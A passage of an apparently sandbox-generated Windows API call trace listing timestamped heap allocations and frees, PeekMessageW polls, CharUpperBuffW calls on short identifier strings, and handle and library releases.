lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0259.928] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.928] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0259.928] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.928] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.928] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0259.928] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.928] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0259.928] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.928] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.928] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.928] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.928] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0259.929] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0259.929] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0259.929] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0259.929] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0259.929] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.929] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.929] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.929] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.929] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.929] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.929] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0259.929] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.930] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0259.930] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.930] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.930] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.930] CryptReleaseContext (hProv=0xad31c0, dwFlags=0x0) returned 1 [0259.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0259.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0259.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0259.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0259.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0259.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0259.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0259.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0259.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0259.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0259.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0259.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0259.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0259.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0259.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0259.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0259.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0259.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0259.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0259.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0259.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0259.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0259.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0259.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0259.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0259.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0259.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0259.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0259.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0259.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0259.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0259.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0259.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0259.933] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0259.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0259.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0259.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0259.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0259.933] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0259.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0259.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0259.934] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0259.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0259.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0259.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0259.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0259.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0259.934] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0259.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0259.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0259.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0259.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0259.935] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0259.935] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0259.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0259.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0259.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0259.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0259.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0259.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0259.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0259.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0259.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0259.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.936] FreeLibrary (hLibModule=0x74d40000) returned 1 [0259.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0259.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0259.937] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0259.937] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0259.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0259.937] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0259.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0259.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0259.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0259.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0259.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0259.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0259.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0259.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0259.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0259.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0259.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0259.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0259.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0259.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0259.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0259.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0259.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0259.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0259.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0259.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0259.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0259.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0259.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0259.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.939] CloseHandle (hObject=0x2cc) returned 1 [0259.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0259.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0259.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0259.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0259.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0259.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0259.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0259.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0259.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0259.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0259.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0259.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0259.941] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0259.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0259.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0259.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0259.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0259.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0259.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0259.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0259.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0259.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0259.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0259.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0259.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0259.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0259.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.941] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0259.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0259.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0259.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0259.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0259.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa038 [0259.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0259.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0259.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0259.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0259.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0259.942] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0259.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0259.942] CloseHandle (hObject=0x2d0) returned 1 [0259.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0259.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0259.948] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3561010 | out: hHeap=0x25c0000) returned 1 [0259.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0259.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0259.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0259.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0259.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0259.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0259.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0259.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0259.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0259.949] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0259.949] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0259.949] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0259.950] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0259.950] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 